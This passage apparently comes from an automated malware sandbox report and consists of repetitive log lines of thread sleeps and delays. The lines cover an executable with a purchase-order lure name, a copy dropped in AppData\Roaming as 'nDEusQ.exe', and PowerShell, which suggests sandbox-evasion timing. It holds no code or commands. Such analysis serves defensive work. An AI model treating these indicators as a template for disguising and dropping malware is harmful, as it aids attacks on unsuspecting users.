                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597437Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597328Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597219Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597109Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597000Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 596890Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 596781Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 596438Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 596279Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 596020Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595891Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595781Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595672Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595562Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595453Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595344Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595234Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595125Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 595015Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594906Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594797Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594688Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594578Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594469Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594359Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594250Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594141Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 594031Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593922Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593813Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593688Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593563Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593438Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593328Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 593219Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 599891
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 599763
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 599590
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 599156
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598878
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598696
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598594
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598483
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598375
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598264
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598155
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 598045
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597937
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597828
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597717
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597609
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597500
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597391
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597281
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597172
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 597062
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596953
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596844
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596734
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596625
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596516
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596406
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596297
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596188
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 596078
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595967
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595859
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595750
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595640
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595531
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595422
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595312
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595203
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 595094
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594984
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594875
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594765
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594656
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594538
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594438
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594328
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594219
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 594109
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 593999
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeThread delayed: delay time: 593891
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7318Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1077Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6981Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 580Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeWindow / User API: threadDelayed 3840Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeWindow / User API: threadDelayed 5978Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeWindow / User API: threadDelayed 7288
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeWindow / User API: threadDelayed 2557
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 7480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep count: 7318 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 1077 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8148Thread sleep count: 3840 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -599656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -599531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -599158s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -598994s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -598875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -598765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -598656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8148Thread sleep count: 5978 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -598547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -598437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -598328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -598219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -598094s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -597984s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -597875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -597766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -597656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -597547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -597437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -597328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -597219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -597109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -597000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -596890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -596781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -596438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -596279s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -596020s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -595891s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -595781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -595672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -595562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -595453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -595344s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -595234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -595125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -595015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -594906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -594797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -594688s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -594578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -594469s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -594359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -594250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -594141s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -594031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -593922s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -593813s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -593688s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -593563s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -593438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -593328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe TID: 8144Thread sleep time: -593219s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 8060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep count: 33 > 30
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -30437127721620741s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -599891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 2056Thread sleep count: 7288 > 30
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 2056Thread sleep count: 2557 > 30
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -599763s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -599590s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -599156s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -598878s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -598696s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -598594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -598483s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -598375s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -598264s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -598155s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -598045s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -597937s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -597828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -597717s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -597609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -597500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -597391s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -597281s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -597172s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -597062s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -596953s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -596844s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -596734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -596625s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -596516s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -596406s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -596297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -596188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -596078s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -595967s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -595859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -595750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -595640s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -595531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -595422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -595312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -595203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -595094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -594984s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -594875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -594765s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -594656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -594538s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -594438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -594328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -594219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -594109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -593999s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exe TID: 6828Thread sleep time: -593891s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 599531Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 599158Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598994Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598875Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598765Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598656Jump to behavior
